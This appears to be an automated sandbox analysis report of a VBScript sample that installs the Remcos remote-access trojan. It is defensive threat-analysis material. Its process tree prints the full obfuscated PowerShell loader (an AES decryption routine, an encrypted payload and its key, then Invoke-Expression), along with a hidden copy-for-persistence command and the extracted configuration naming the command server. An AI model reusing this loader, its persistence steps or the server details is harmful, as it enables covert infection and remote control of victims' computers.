Analysis
-
max time kernel
150s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
05/12/2023, 16:40
Static task
static1
Behavioral task
behavioral1
Sample
sostener.vbs
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
sostener.vbs
Resource
win10v2004-20231127-en
General
-
Target
sostener.vbs
-
Size
159KB
-
MD5
bddd8601fde69d9376fec504ee5c812a
-
SHA1
a0e6e03bc0ffdfa06535e2c6ce501e8037e1b331
-
SHA256
135bda295f096086b57df4c66f9edc207b01d7792c16b808039f8fa64e9eecf1
-
SHA512
8db21dbff6bc24647092eac6909a7962c182fe1970d8a9e57c922959061e750914485319594e74099599e4b619f4700a4b332cf84b071b09683bf46e048c5e9f
-
SSDEEP
192:m2aql0M+pOo8nOncu1IbNyUWDcavU5VvJlZcHh2aHJlZx:fauoqGcuWUUWDNUlpapN
Malware Config
Extracted
remcos
RemoteHost
remccoss2023.duckdns.org:4576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-E5ZBB0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 19 656 powershell.exe 42 656 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 656 set thread context of 1156 656 powershell.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 656 powershell.exe 656 powershell.exe 4380 powershell.exe 4380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 656 powershell.exe Token: SeDebugPrivilege 4380 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1156 RegAsm.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 5064 wrote to memory of 656 5064 WScript.exe 88 PID 5064 wrote to memory of 656 5064 WScript.exe 88 PID 656 wrote to memory of 4380 656 powershell.exe 92 PID 656 wrote to memory of 4380 656 powershell.exe 92 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97 PID 656 wrote to memory of 1156 656 powershell.exe 97
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '87515485271233904521';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:1156
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD57620dd7848bcf2b6dd104c1c5f2a99b7
SHA1ee71a23ad7b050dfd08e30b639dd5fa31b26c051
SHA256ee91439b3d8382ed2b4fa7a1952ce01a63873931f8ed4dec2441ef1c806a9c41
SHA5127f2c1c2167593d08f0d500d0edf2063e6b2e681d30f9b6e98fe56a9e02fbee8dee664f5d2b2bbdf49beb87cc471dbee092bda8ba06eb8459b88257aa658d26fb
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
2KB
MD5e15c0d21ab521b4f435f2a00baf42326
SHA19e0ce8770c31810bc1d1e1cda4c7f21531f9c686
SHA2564c7d6e2b735c4a5f6208da0371c7ba1da73b57b63f097d795e006849aaae7f4e
SHA51270ecf8ce3c6d67132f417805ff3bb5c368a22ebeccc33db407a8cc714006688c7ee2802f2701a9770496f0e1c3233180b5a3db4382285694d86380ed076c498e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82